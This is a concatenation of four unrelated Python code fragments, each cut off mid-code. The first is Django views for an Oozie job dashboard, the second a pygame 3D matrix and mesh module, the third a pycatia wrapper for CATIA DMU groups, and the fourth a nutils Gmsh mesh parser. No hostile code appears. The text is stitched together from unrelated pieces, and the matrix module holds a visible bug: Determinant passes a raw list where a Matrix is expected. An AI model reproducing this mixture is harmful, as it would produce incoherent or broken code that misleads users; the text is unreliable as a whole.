coordinator = History.objects.get(oozie_job_id=job_id).job.get_full_node()
except History.DoesNotExist:
pass
oozie_bundle = None
if request.GET.get('bundle_job_id'):
oozie_bundle = check_job_access_permission(request, request.GET.get('bundle_job_id'))
show_all_actions =request.GET.get('show_all_actions') == 'true'
if request.GET.get('format') == 'json':
actions = massaged_coordinator_actions_for_json(oozie_coordinator, oozie_bundle)
if not show_all_actions:
actions = actions[:MAX_COORD_ACTIONS]
return_obj = {
'id': oozie_coordinator.id,
'status': oozie_coordinator.status,
'progress': oozie_coordinator.get_progress(),
'nextTime': format_time(oozie_coordinator.nextMaterializedTime),
'endTime': format_time(oozie_coordinator.endTime),
'log': oozie_coordinator.log,
'actions': actions,
'show_all_actions': show_all_actions
}
return HttpResponse(encode_json_for_js(return_obj), mimetype="application/json")
oozie_slas = []
if oozie_coordinator.has_sla:
api = get_oozie(request.user, api_version="v2")
params = {
'id': oozie_coordinator.id,
'parent_id': oozie_coordinator.id
}
oozie_slas = api.get_oozie_slas(**params)
return render('dashboard/list_oozie_coordinator.mako', request, {
'oozie_coordinator': oozie_coordinator,
'oozie_slas': oozie_slas,
'coordinator': coordinator,
'oozie_bundle': oozie_bundle,
'has_job_edition_permission': has_job_edition_permission,
'show_all_actions': show_all_actions,
'MAX_COORD_ACTIONS': MAX_COORD_ACTIONS
})
@show_oozie_error
def list_oozie_bundle(request, job_id):
oozie_bundle = check_job_access_permission(request, job_id)
# Cross reference the submission history (if any)
bundle = None
try:
bundle = History.objects.get(oozie_job_id=job_id).job.get_full_node()
except History.DoesNotExist:
pass
if request.GET.get('format') == 'json':
return_obj = {
'id': oozie_bundle.id,
'status': oozie_bundle.status,
'progress': oozie_bundle.get_progress(),
'endTime': format_time(oozie_bundle.endTime),
'log': oozie_bundle.log,
'actions': massaged_bundle_actions_for_json(oozie_bundle)
}
return HttpResponse(json.dumps(return_obj).replace('\\\\', '\\'), mimetype="application/json")
return render('dashboard/list_oozie_bundle.mako', request, {
'oozie_bundle': oozie_bundle,
'bundle': bundle,
'has_job_edition_permission': has_job_edition_permission,
})
@show_oozie_error
def list_oozie_workflow_action(request, action):
try:
action = get_oozie(request.user).get_action(action)
workflow = check_job_access_permission(request, action.id.split('@')[0])
except RestException, ex:
raise PopupException(_("Error accessing Oozie action %s.") % (action,), detail=ex.message)
oozie_coordinator = None
if request.GET.get('coordinator_job_id'):
oozie_coordinator = check_job_access_permission(request, request.GET.get('coordinator_job_id'))
oozie_bundle = None
if request.GET.get('bundle_job_id'):
oozie_bundle = check_job_access_permission(request, request.GET.get('bundle_job_id'))
workflow.oozie_coordinator = oozie_coordinator
workflow.oozie_bundle = oozie_bundle
return render('dashboard/list_oozie_workflow_action.mako', request, {
'action': action,
'workflow': workflow,
'oozie_coordinator': oozie_coordinator,
'oozie_bundle': oozie_bundle,
})
@show_oozie_error
def list_oozie_info(request):
api = get_oozie(request.user)
instrumentation = api.get_instrumentation()
configuration = api.get_configuration()
oozie_status = api.get_oozie_status()
return render('dashboard/list_oozie_info.mako', request, {
'instrumentation': instrumentation,
'configuration': configuration,
'oozie_status': oozie_status,
})
@show_oozie_error
def list_oozie_sla(request):
api = get_oozie(request.user, api_version="v2")
if request.method == 'POST':
params = {}
job_name = request.POST.get('job_name')
if re.match('.*-oozie-oozi-[WCB]', job_name):
params['id'] = job_name
params['parent_id'] = job_name
else:
params['app_name'] = job_name
if 'useDates' in request.POST:
if request.POST.get('start'):
params['nominal_start'] = request.POST.get('start')
if request.POST.get('end'):
params['nominal_end'] = request.POST.get('end')
oozie_slas = api.get_oozie_slas(**params)
else:
oozie_slas = [] # or get latest?
if request.REQUEST.get('format') == 'json':
massaged_slas = []
for sla in oozie_slas:
massaged_slas.append(massaged_sla_for_json(sla, request))
return HttpResponse(json.dumps({'oozie_slas': massaged_slas}), content_type="text/json")
return render('dashboard/list_oozie_sla.mako', request, {
'oozie_slas': oozie_slas
})
def massaged_sla_for_json(sla, request):
massaged_sla = {
'slaStatus': sla['slaStatus'],
'id': sla['id'],
'appType': sla['appType'],
'appName': sla['appName'],
'appUrl': get_link(sla['id']),
'user': sla['user'],
'nominalTime': sla['nominalTime'],
'expectedStart': sla['expectedStart'],
'actualStart': sla['actualStart'],
'expectedEnd': sla['expectedEnd'],
'actualEnd': sla['actualEnd'],
'jobStatus': sla['jobStatus'],
'expectedDuration': sla['expectedDuration'],
'actualDuration': sla['actualDuration'],
'lastModified': sla['lastModified']
}
return massaged_sla
@show_oozie_error
def rerun_oozie_job(request, job_id, app_path):
ParametersFormSet = formset_factory(ParameterForm, extra=0)
oozie_workflow = check_job_access_permission(request, job_id)
check_job_edition_permission(oozie_workflow, request.user)
if request.method == 'POST':
rerun_form = RerunForm(request.POST, oozie_workflow=oozie_workflow)
params_form = ParametersFormSet(request.POST)
if sum([rerun_form.is_valid(), params_form.is_valid()]) == 2:
args = {}
if request.POST['rerun_form_choice'] == 'fail_nodes':
args['fail_nodes'] = 'true'
else:
args['skip_nodes'] = ','.join(rerun_form.cleaned_data['skip_nodes'])
args['deployment_dir'] = app_path
mapping = dict([(param['name'], param['value']) for param in params_form.cleaned_data])
_rerun_workflow(request, job_id, args, mapping)
request.info(_('Workflow re-running.'))
return redirect(reverse('oozie:list_oozie_workflow', kwargs={'job_id': job_id}))
else:
request.error(_('Invalid submission form: %s %s' % (rerun_form.errors, params_form.errors)))
else:
rerun_form = RerunForm(oozie_workflow=oozie_workflow)
initial_params = ParameterForm.get_initial_params(oozie_workflow.conf_dict)
params_form = ParametersFormSet(initial=initial_params)
popup = render('dashboard/rerun_job_popup.mako', request, {
'rerun_form': rerun_form,
'params_form': params_form,
'action': reverse('oozie:rerun_oozie_job', kwargs={'job_id': job_id, 'app_path': app_path}),
}, force_template=True).content
return HttpResponse(json.dumps(popup), mimetype="application/json")
def _rerun_workflow(request, oozie_id, run_args, mapping):
try:
submission = Submission(user=request.user, fs=request.fs, jt=request.jt, properties=mapping, oozie_id=oozie_id)
job_id = submission.rerun(**run_args)
return job_id
except RestException, ex:
raise PopupException(_("Error re-running workflow %s.") % (oozie_id,),
detail=ex._headers.get('oozie-error-message', ex))
@show_oozie_error
def rerun_oozie_coordinator(request, job_id, app_path):
oozie_coordinator = check_job_access_permission(request, job_id)
check_job_edition_permission(oozie_coordinator, request.user)
ParametersFormSet = formset_factory(ParameterForm, extra=0)
if request.method == 'POST':
params_form = ParametersFormSet(request.POST)
rerun_form = RerunCoordForm(request.POST, oozie_coordinator=oozie_coordinator)
if sum([rerun_form.is_valid(), params_form.is_valid()]) == 2:
args = {}
args['deployment_dir'] = app_path
params = {
'type': 'action',
'scope': ','.join(oozie_coordinator.aggreate(rerun_form.cleaned_data['actions'])),
'refresh': rerun_form.cleaned_data['refresh'],
'nocleanup': rerun_form.cleaned_data['nocleanup'],
}
properties = dict([(param['name'], param['value']) for param in params_form.cleaned_data])
_rerun_coordinator(request, job_id, args, params, properties)
request.info(_('Coordinator re-running.'))
return redirect(reverse('oozie:list_oozie_coordinator', kwargs={'job_id': job_id}))
else:
request.error(_('Invalid submission form: %s' % (rerun_form.errors,)))
return list_oozie_coordinator(request, job_id)
else:
rerun_form = RerunCoordForm(oozie_coordinator=oozie_coordinator)
initial_params = ParameterForm.get_initial_params(oozie_coordinator.conf_dict)
params_form = ParametersFormSet(initial=initial_params)
popup = render('dashboard/rerun_coord_popup.mako', request, {
'rerun_form': rerun_form,
'params_form': params_form,
'action': reverse('oozie:rerun_oozie_coord', kwargs={'job_id': job_id, 'app_path': app_path}),
}, force_template=True).content
return HttpResponse(json.dumps(popup), mimetype="application/json")
def _rerun_coordinator(request, oozie_id, args, params, properties):
try:
submission = Submission(user=request.user, | |
transpose(self):
temp = [[0 for i in range(self.col)] for j in range(self.row)]
for x in range(self.row):
for y in range(self.col):
temp[x][y] = self.val[y][x]
self.val = temp
def __repr__(self):
## DEBUG
return f'matrix->{self.val}'
def multiplyMatrix(m1, m2):
m = Matrix(m1.row, m2.col)
if m1.col != m2.row:
print("we can't this two matricies")
return None
for x in range(m1.row):
for y in range(m2.col):
sum = 0
for z in range(m1.col):
sum += m1.val[x][z] * m2.val[z][y]
m.val[x][y] = round(sum, 5)
return m
def multiplyMatrixVector(vec, mat):
temp = Matrix(1, 4)
temp.val = vec.toMatrix()
m = multiplyMatrix(temp, mat)
v = toVector3(m)
if m.val[0][3] != 0:
v = v / m.val[0][3]
return v
def TransposeMatrix(m):
m1 = Matrix(m.row, m.col)
for x in range(m.row):
for y in range(m.col):
m1.val[x][y] = m.val[y][x]
return m1
def Determinant2x2(matrix):
# print(matrix.val)
return matrix.val[0][0] * matrix.val[1][1] - matrix.val[0][1] * matrix.val[1][0]
def submatrix(matrix, row, column):
temp = deepcopy(matrix)
del temp.val[row]
for i in range(len(temp.val)):
del temp.val[i][column]
temp.updateInfo()
# print(temp.val)
return temp
def Minor3x3(matrix, row, column):
s = submatrix(matrix, row, column)
if len(s.val) > 2:
return Determinant(s)
else:
return Determinant2x2(s)
def Cofactor3x3(matrix, row, column):
minor = Minor3x3(matrix, row, column)
if (row + column) % 2 == 0:
return minor
else:
return -minor
def Determinant(matrix):
if matrix.row == 2:
return Determinant2x2(matrix.val)
else:
d = 0
for j in range(len(matrix.val[0])):
c = Cofactor3x3(matrix, 0, j)
d += c * matrix.val[0][j]
return d
def MatrixInversion(matrix):
d = Determinant(matrix)
if d == 0:
print("this matrix is not invertible")
return None
new = Matrix(matrix.row, matrix.col)
for x in range(matrix.row):
for y in range(matrix.col):
new.val[x][y] = round(Cofactor3x3(matrix, x, y) / d, 6)
new.transpose()
# print(new.val)
return new
def QuickInverse(m):
matrix = Matrix()
matrix.val[0][0], matrix.val[0][1], matrix.val[0][2], matrix.val[0][3] = m.val[0][0], m.val[1][0], m.val[2][0], 0.0
matrix.val[1][0], matrix.val[1][1], matrix.val[1][2], matrix.val[1][3] = m.val[0][1], m.val[1][1], m.val[2][1], 0.0
matrix.val[2][0], matrix.val[2][1], matrix.val[2][2], matrix.val[2][3] = m.val[0][2], m.val[1][2], m.val[2][2], 0.0
matrix.val[3][0] = -(m.val[3][0] * matrix.val[0][0] + m.val[3][1] * matrix.val[1][0] + m.val[3][2] * matrix.val[2][0])
matrix.val[3][1] = -(m.val[3][0] * matrix.val[0][1] + m.val[3][1] * matrix.val[1][1] + m.val[3][2] * matrix.val[2][1])
matrix.val[3][2] = -(m.val[3][0] * matrix.val[0][2] + m.val[3][1] * matrix.val[1][2] + m.val[3][2] * matrix.val[2][2])
matrix.val[3][3] = 1.0
return matrix
def translate(value, min1, max1, min2, max2):
return min2 + (max2 - min2) * ((value-min1)/(max1-min1))
def CubeTriangles(color, position=Vector3(), scale=1):
return [
Triangle( Vector3(-1.0, -1.0, -1.0) * scale + position, Vector3(-1.0, 1.0, -1.0) * scale + position, Vector3(1.0, 1.0, -1.0) * scale + position, color),
Triangle( Vector3(-1.0, -1.0, -1.0) * scale + position, Vector3(1.0, 1.0, -1.0) * scale + position, Vector3(1.0, -1.0, -1.0) * scale + position, color),
Triangle( Vector3(1.0, -1.0, -1.0) * scale + position, Vector3(1.0, 1.0, -1.0) * scale + position, Vector3(1.0, 1.0, 1.0) * scale + position, color),
Triangle( Vector3(1.0, -1.0, -1.0) * scale + position, Vector3(1.0, 1.0, 1.0) * scale + position, Vector3(1.0, -1.0, 1.0) * scale + position, color),
Triangle( Vector3(1.0, -1.0, 1.0) * scale + position, Vector3(1.0, 1.0, 1.0) * scale + position, Vector3(-1.0, 1.0, 1.0) * scale + position, color),
Triangle( Vector3(1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, 1.0, 1.0) * scale + position, Vector3(-1.0, -1.0, 1.0) * scale + position, color),
Triangle( Vector3(-1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, 1.0, 1.0) * scale + position, Vector3(-1.0, 1.0, -1.0) * scale + position, color),
Triangle( Vector3(-1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, 1.0, -1.0) * scale + position, Vector3(-1.0, -1.0, -1.0) * scale + position, color),
Triangle( Vector3(-1.0, 1.0, -1.0) * scale + position, Vector3(-1.0, 1.0, 1.0) * scale + position, Vector3(1.0, 1.0, 1.0) * scale + position, color),
Triangle( Vector3(-1.0, 1.0, -1.0) * scale + position, Vector3(1.0, 1.0, 1.0) * scale + position, Vector3(1.0, 1.0, -1.0) * scale + position, color),
Triangle( Vector3(1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, -1.0, -1.0) * scale + position, color),
Triangle( Vector3(1.0, -1.0, 1.0) * scale + position, Vector3(-1.0, -1.0, -1.0) * scale + position, Vector3(1.0, -1.0, -1.0) * scale + position, color),
]
def QuadTriangles(color=(255, 255, 255), size=5):
vertices = [
Vector3(-size, -size, -size),
Vector3(-size, size, -size),
Vector3(size, size, -size),
Vector3(size, -size, -size)
]
return [
Triangle(vertices[0], vertices[1], vertices[2], color),
Triangle(vertices[0], vertices[2], vertices[3], color)
]
def PlaneTriangles(color=(255, 255, 255), resolution=10, size=2):
meshData = []
vertices = [[None for i in range(resolution)] for j in range(resolution)]
for i in range(resolution):
for j in range(resolution):
x = translate(i, 0, resolution, -size, size)
y = translate(j, 0, resolution, -size, size)
vertices[i][j] = Vector3(x, 0, y)
for i in range(resolution):
for j in range(resolution):
if i + 1 < resolution and j + 1 < resolution:
v1 = vertices[i][j]
v2 = vertices[i+1][j]
v3 = vertices[i][j+1]
v4 = vertices [i+1][j+1]
meshData.append(Triangle(v1, v2, v3, color))
meshData.append(Triangle(v4, v3, v2, color))
return meshData
class Point:
def __init__(self, position, color=(255, 255, 255), radius=10):
self.position = position
self.color = color
self.radius = radius
self.transform = Matrix.identity()
def update(self,screen, camera,showPoint=False):
projected = None
transformed = None
transformed = multiplyMatrixVector(self.position, self.transform)
transformed += Vector3(0, 0, Zoffset)
transformed = multiplyMatrixVector(transformed, camera.viewMatrix)
projected = multiplyMatrixVector(transformed, camera.projection())
projected *= Vector3(-1, -1, 1)
offsetView = Vector3(1, 1, 0)
projected = projected + offsetView
projected *= Vector3(Width, Height, 1) * 0.5
if showPoint:
pygame.draw.circle(screen,self.color, projected.GetTuple(), self.radius)
return projected
def SphereTriangles(color,n_subdivision=10, radius=1):
#simple UV SPHERE
meshData = []
vertices = []
#adding top vertex
vertices.append(Vector3(0, radius, 0))
#generate vertices of the sphere
for i in range(n_subdivision):
phi = pi * (i+1) / n_subdivision
for j in range(n_subdivision):
theta = 2 * pi * j / n_subdivision
x = radius * sin(phi) * cos(theta)
y = radius * cos(phi)
z = radius * sin(phi) * sin(theta)
vertices.append(Vector3(x, y, z))
#add bottom vertex
vertices.append(Vector3(0, -radius, 0))
#add top and bottom triangles
for i in range(n_subdivision):
i0 = i + 1
i1 = (i+1) % n_subdivision + 1
meshData.append(Triangle(vertices[0], vertices[i1], vertices[i0], color) )
i0 = i + n_subdivision * (n_subdivision - 2) + 1
i1 = (i+1) % n_subdivision + n_subdivision * (n_subdivision - 2) + 1
meshData.append( Triangle(vertices[-1], vertices[i1], vertices[i0], color) )
for j in range(n_subdivision-2):
j0 = j * n_subdivision + 1
j1 = (j+1) * n_subdivision + 1
for i in range(n_subdivision):
i0 = j0 + i
i1 = j0 + (i + 1) % n_subdivision
i2 = j1 + (i + 1) % n_subdivision
i3 = j1 + i
meshData.append( Triangle(vertices[i0], vertices[i1], vertices[i2], color))
meshData.append( Triangle(vertices[i0], vertices[i2], vertices[i3], color))
return meshData
def GetMiddlePoint(vec1, vec2, vertices, middlePointCache):
a = vertices.index(vec1)
b = vertices.index(vec2)
# check if the edge is already divided to avoid duplicated vertices
smallerIndex, greaterIndex = b, a
if a < b:
smallerIndex = a
greaterIndex = b
key = f"{smallerIndex}, {greaterIndex}"
if key in middlePointCache:
return middlePointCache[key]
vertex1 = vertices[a]
vertex2 = vertices[b]
middle = Normalize( (vertex1+vertex2)/2 )
vertices.append(middle)
_index = vertices.index(middle)
middlePointCache.update({key: _index})
return _index
def IcosphereTriangles(color=(255, 255, 255), subdivision=0, radius=1):
middlePointCache = {}
g = (1 + sqrt(5))/2 #golden ratio
vertices = [
Normalize(Vector3(-1, g, 0)),
Normalize(Vector3( 1, g, 0)),
Normalize(Vector3(-1, -g, 0)),
Normalize(Vector3( 1, -g, 0)),
Normalize(Vector3( 0, -1, g)),
Normalize(Vector3( 0, 1, g)),
Normalize(Vector3( 0, -1, -g)),
Normalize(Vector3( 0, 1, -g)),
Normalize(Vector3( g, 0, -1)),
Normalize(Vector3( g, 0, 1)),
Normalize(Vector3( -g, 0, -1)),
Normalize(Vector3( -g, 0, 1))
]
triangles = [
# 5 faces around point 0
Triangle(vertices[0], vertices[11], vertices[5], color),
Triangle(vertices[0], vertices[5], vertices[1], color),
Triangle(vertices[0], vertices[1], vertices[7], color),
Triangle(vertices[0], vertices[7], vertices[10], color),
Triangle(vertices[0], vertices[10], vertices[11], color),
# Adjacent faces
Triangle(vertices[1], vertices[5], vertices[9], color),
Triangle(vertices[5], vertices[11], vertices[4], color),
Triangle(vertices[11], vertices[10], vertices[2], color),
Triangle(vertices[10], vertices[7], vertices[6], color),
Triangle(vertices[7], vertices[1], vertices[8], color),
# 5 faces around 3
Triangle(vertices[3], vertices[9], vertices[4], color),
Triangle(vertices[3], vertices[4], vertices[2], color),
Triangle(vertices[3], vertices[2], vertices[6], color),
Triangle(vertices[3], vertices[6], vertices[8], color),
Triangle(vertices[3], vertices[8], vertices[9], color),
# Adjacent faces
Triangle(vertices[4], vertices[9], vertices[5], color),
Triangle(vertices[2], vertices[4], vertices[11], color),
Triangle(vertices[6], vertices[2], vertices[10], color),
Triangle(vertices[8], vertices[6], vertices[7], color),
Triangle(vertices[9], vertices[8], vertices[1], color)
]
# subdivision
for i in range(subdivision):
subdivisions = []
for triangle in triangles:
_i0 = GetMiddlePoint(triangle.vertex1, triangle.vertex2, vertices, middlePointCache)
_i1 = GetMiddlePoint(triangle.vertex2, triangle.vertex3, vertices, middlePointCache)
_i2 = GetMiddlePoint(triangle.vertex3, triangle.vertex1, vertices, middlePointCache)
vertex1 = vertices[_i0]
vertex2 = vertices[_i1]
| |
<filename>pycatia/navigator_interfaces/group.py
#! usr/bin/python3.6
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-06-11 12:40:47.360445
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from pycatia.product_structure_interfaces.product import Product
from pycatia.system_interfaces.any_object import AnyObject
from pycatia.types.general import cat_variant
class Group(AnyObject):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.AnyObject
| Group
|
| Represents a DMU group.
| The DMU group is an entity which gathers references to several products in
| order to automate validation and verification of the Digital
| Mock-Up.
|
| A user can build a group using several methods: explicitely point out some
| products or take all products by default. The designated products can be
| intermediate or terminal node of the product structure. For instance, a user
| who has to verify the integration of the engine in engine bay may define a
| group with the engine assembly or with all the parts from the engine in order
| to detect clashes. In the first case this user has to add the engine assembly
| (as a product) in the group, and in the second case, to add all the parts to
| the group. Obviously, when a modification happens to the engine assembly the
| user has to change the group only in the second case. To manage the explicit
| definition of the group, one may use the XxxxExplicit methods.
|
| When the system takes the group into account to perform a given task, it may be
| necessary to retrieve:
|
| The products designated by the user (For example, the section of these
| products)
| The terminal nodes (or leaves) of the product (For example, clash detection
| takes into account terminal nodes)
| The set of products in the product structure which are not selected (For
| example, hide all products which are not in the group)
| The set of terminal nodes which are not selected (For example, clash of
| some products against all others).
|
| To perform these treatments one may use YyyyExtract or ZzzzInvert
| methods.
"""
def __init__(self, com_object):
super().__init__(com_object)
self.group = com_object
@property
def extract_mode(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property ExtractMode() As long
|
| Returns or sets the mode for the extraction methods.
|
| Returns:
| The extraction mode
|
| 0: the extraction provides the products from the group
| (intermediate of terminal nodes).
| 1: the extraction provides terminal nodes of the products from the
| group.
|
| Example:
|
| This example retrieves the extraction mode of the NewGroup Group
| and sets it to 1.
|
|
| Dim Mode As Integer
| Mode = NewGroup.ExtractMode
| NewGroup.ExtractMode = 1
:return: int
:rtype: int
"""
return self.group.ExtractMode
@extract_mode.setter
def extract_mode(self, value: int):
"""
:param int value:
"""
self.group.ExtractMode = value
def add_explicit(self, i_product: AnyObject) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub AddExplicit(CATBaseDispatch iProduct)
|
| Adds a product to the group.
|
| Parameters:
|
| iProduct
| The product to add
|
| Example:
|
| This example adds the product MyProduct to the group
| NewGroup.
|
|
| NewGroup.AddExplicit MyProduct
:param AnyObject i_product:
:return: None
:rtype: None
"""
return self.group.AddExplicit(i_product.com_object)
def count_explicit(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func CountExplicit() As long
|
| Returns the number of products in the group.
|
| Example:
|
| This example retrieves the number of products in the group
| NewGroup.
|
|
| Dim number As Integer
| number = NewGroup.CountExplicit
:return: int
:rtype: int
"""
return self.group.CountExplicit()
def count_extract(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func CountExtract() As long
|
| Returns the number of products which can be extracted from the
| group.
|
| Depending on the extraction mode, the extracted products can
| be:
|
| Mode = 0: the products from the group (intermediate or terminal nodes).
| Mode = 1: the terminal nodes of the products from the group.
|
| Returns:
| The number of products
| Example:
|
| This example reads the number of products in the group
| NewGroup.
|
|
| Dim number As Integer
| number = NewGroup.CountExtract
:return: int
:rtype: int
"""
return self.group.CountExtract()
def count_invert(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func CountInvert() As long
|
| Returns the number of terminal node products which cannot be extracted from
| the group.
|
| Example:
|
| This example retrieves the number of terminal node products which
| cannot be extracted from the group NewGroup.
|
|
| Dim number As Integer
| number = NewGroup.CountInvert
:return: int
:rtype: int
"""
return self.group.CountInvert()
def fill_sel_with_extract(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub FillSelWithExtract()
|
| Fills the selection with all products which can be extracted from the
| group.
|
| Example:
|
| This example fills the selection with products which can be
| extracted
| from the NewGroup group.
|
|
| NewGroup.FillSelWithExtract
:return: None
:rtype: None
"""
return self.group.FillSelWithExtract()
def fill_sel_with_invert(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub FillSelWithInvert()
|
| Fills the selection with all terminal node products which cannot be
| extracted from the group.
|
| Example:
|
| This example fills the selection with all products which cannnot
| be extracted
| from the NewGroup group.
|
|
| NewGroup.FillSelWithInvert
:return: None
:rtype: None
"""
return self.group.FillSelWithInvert()
def item_explicit(self, i_index: cat_variant) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func ItemExplicit(CATVariant iIndex) As CATBaseDispatch
|
| Returns a product using its index in the group.
|
| Parameters:
|
| iIndex
| The index of the product in the group. The index of the first
| product is 1, and the index of the last product is CountExplicit.
|
|
| Returns:
| The retrieved product
| Example:
|
| This example retrieves in ThisProduct the ninth
| product
| from the NewGroup group.
|
|
| Dim ThisProduct As Product
| Set ThisProduct = NewGroup.ItemExplicit(9)
:param cat_variant i_index:
:return: AnyObject
:rtype: AnyObject
"""
return self.group.ItemExplicit(i_index)
def item_extract(self, i_index: cat_variant) -> Product:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func ItemExtract(CATVariant iIndex) As Product
|
| Returns a product which can be extracted from the group using its
| index.
|
| Parameters:
|
| iIndex
| The index of the product in the group. The index of the first
| product is 1, and the index of the last product is CountExtract.
|
|
| Returns:
| The retrieved product
| Example:
|
| This example retrieves in ThisProduct the ninth
| product
| |
indices = set(patches.flat)
if tuple(sorted(indices)) != tuple(range(len(indices))):
raise ValueError('Patch vertices in `patches` should be numbered consecutively, starting at 0.')
if len(patchverts) != len(indices):
raise ValueError('Number of `patchverts` does not equal number of vertices specified in `patches`.')
if len(patchverts.shape) != 2:
raise ValueError('Every patch vertex should be an array of dimension 1.')
topos = []
coords = []
for i, patch in enumerate(patches):
# find shape of patch and local patch coordinates
shape = []
for dim in range(ndims):
nelems_sides = []
sides = [(0,1)]*ndims
sides[dim] = slice(None),
for side in itertools.product(*sides):
sideverts = frozenset(patch[side])
if sideverts in nelems:
nelems_sides.append(nelems[sideverts])
else:
nelems_sides.append(nelems[None])
if len(set(nelems_sides)) != 1:
raise ValueError('duplicate number of elements specified for patch {} in dimension {}'.format(i, dim))
shape.append(nelems_sides[0])
# create patch topology
topos.append(rectilinear(shape, name='{}{}'.format(name, i))[0])
# compute patch geometry
patchcoords = [numpy.linspace(0, 1, n+1) for n in shape]
patchcoords = numeric.meshgrid(*patchcoords).reshape(ndims, -1)
if patchverts is not None:
patchcoords = numpy.array([
sum(
patchverts[j]*util.product(c if s else 1-c for c, s in zip(coord, side))
for j, side in zip(patch.flat, itertools.product(*[[0,1]]*ndims))
)
for coord in patchcoords.T
]).T
coords.append(patchcoords)
# build patch boundary data
boundarydata = topology.MultipatchTopology.build_boundarydata(patches)
# join patch topologies, geometries
topo = topology.MultipatchTopology(tuple(map(topology.Patch, topos, patches, boundarydata)))
funcsp = topo.basis('spline', degree=1, patchcontinuous=False)
geom = (funcsp * numpy.concatenate(coords, axis=1)).sum(-1)
return topo, geom
@cache.function
def parsegmsh(mshdata):
"""Gmsh parser
Parser for Gmsh data in ``msh2`` or ``msh4`` format. See the `Gmsh manual
<http://geuz.org/gmsh/doc/texinfo/gmsh.html>`_ for details.
Parameters
----------
mshdata : :class:`io.BufferedIOBase`
Msh file contents.
Returns
-------
:class:`dict`:
Keyword arguments for :func:`simplex`
"""
try:
from meshio import gmsh
except ImportError as e:
raise Exception('parsegmsh requires the meshio module to be installed') from e
msh = gmsh.main.read_buffer(mshdata)
if not msh.cell_sets:
# Old versions of the gmsh file format repeat elements that have multiple
# tags. To support this we edit the meshio data to bring it in the same
# form as the new files by deduplicating cells and creating cell_sets.
renums = []
for icell, cells in enumerate(msh.cells):
keep = (cells.data[1:] != cells.data[:-1]).any(axis=1)
if keep.all():
renum = numpy.arange(len(cells.data))
else:
msh.cells[icell] = cells._replace(data=cells.data[numpy.hstack([True, keep])])
renum = numpy.hstack([0, keep.cumsum()])
renums.append(renum)
for name, (itag, nd) in msh.field_data.items():
msh.cell_sets[name] = [renum[data == itag] for data, renum in zip(msh.cell_data['gmsh:physical'], renums)]
# Coords is a 2d float-array such that coords[inode,idim] == coordinate.
coords = msh.points
# Nodes is a dictionary that maps a topological dimension to a 2d int-array
# dictionary such that nodes[nd][ielem,ilocal] == inode, where ilocal < nd+1
# for linear geometries or larger for higher order geometries. Since meshio
# stores nodes by simplex type and cell, simplex types are mapped to
# dimensions and gathered, after which cells are concatenated under the
# assumption that there is only one simplex type per dimension.
nodes = {('ver','lin','tri','tet').index(typename[:3]): numpy.concatenate(datas, axis=0)
for typename, datas in util.gather((cells.type, cells.data) for cells in msh.cells)}
# Identities is a 2d [master, slave] int-aray that pairs matching nodes on
# periodic walls. For the topological connectivity, all slaves in the nodes
# arrays will be replaced by their master counterpart.
identities = numpy.zeros((0, 2), dtype=int) if not msh.gmsh_periodic \
else numpy.concatenate([d for a, b, c, d in msh.gmsh_periodic], axis=0)
# Tags is a list of (nd, name, ndelems) tuples that define topological groups
# per dimension. Since meshio associates group names with cells, which are
# concatenated in nodes, element ids are offset and concatenated to match.
tags = [(msh.field_data[name][1], name, numpy.concatenate([selection
+ sum(len(cells.data) for cells in msh.cells[:icell] if cells.type == msh.cells[icell].type) # offset into nodes
for icell, selection in enumerate(selections)]))
for name, selections in msh.cell_sets.items()]
# determine the dimension of the topology
ndims = max(nodes)
# determine the dimension of the geometry
assert not numpy.isnan(coords).any()
while coords.shape[1] > ndims and not coords[:,-1].any():
coords = coords[:,:-1]
# separate geometric, topological nodes
cnodes = nodes[ndims]
if cnodes.shape[1] > ndims+1: # higher order geometry
nodes = {nd: n[:,:nd+1] for nd, n in nodes.items()} # remove high order info
if len(identities):
slaves, masters = identities.T
keep = numpy.ones(len(coords), dtype=bool)
keep[slaves] = False
assert keep[masters].all()
renumber = keep.cumsum()-1
renumber[slaves] = renumber[masters]
nodes = {nd: renumber[n] for nd, n in nodes.items()}
vnodes = nodes[ndims]
bnodes = nodes.get(ndims-1)
pnodes = nodes.get(0)
if cnodes is vnodes: # geometry is linear and non-periodic, dofs follow in-place sorting of nodes
degree = 1
elif cnodes.shape[1] == ndims+1: # linear elements: match sorting of nodes
degree = 1
shuffle = vnodes.argsort(axis=1)
cnodes = cnodes[numpy.arange(len(cnodes))[:,_], shuffle] # gmsh conveniently places the primary ndim+1 vertices first
else: # higher order elements: match sorting of nodes and renumber higher order coefficients
degree, nodeorder = { # for meshio's node ordering conventions see http://www.vtk.org/VTK/img/file-formats.pdf
(2, 6): (2, (0,3,1,5,4,2)),
(2,10): (3, (0,3,4,1,8,9,5,7,6,2)),
(2,15): (4, (0,3,4,5,1,11,12,13,6,10,14,7,9,8,2)),
(3,10): (2, (0,4,1,6,5,2,7,8,9,3))}[ndims, cnodes.shape[1]]
enum = numpy.empty([degree+1]*(ndims+1), dtype=int)
